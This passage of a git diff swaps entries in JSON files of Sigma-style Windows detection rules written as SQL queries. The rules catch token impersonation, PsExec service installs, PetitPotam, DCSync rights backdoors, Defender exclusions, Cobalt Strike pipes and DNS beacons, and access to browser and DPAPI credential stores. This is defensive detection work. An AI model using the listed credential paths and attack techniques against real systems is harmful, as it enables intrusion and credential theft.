(Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], - "level": "medium", + "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "TeamViewer Log File Deleted", - "id": "b1decb61-ed83-4339-8e95-53ea51901720", - "status": "test", - "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", - "author": "frack113", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "status": "experimental", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." 
], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_teamviewer_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE 
'%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to 
bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + "Intended inclusions by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (NewProcessName = 'System' AND ParentProcessName = 
'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects 
suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_generic_high.json b/rules/rules_windows_generic_high.json index 44fc46d..0f5d608 100644 --- a/rules/rules_windows_generic_high.json +++ b/rules/rules_windows_generic_high.json 
@@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE 
'\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName 
REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": 
"CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) 
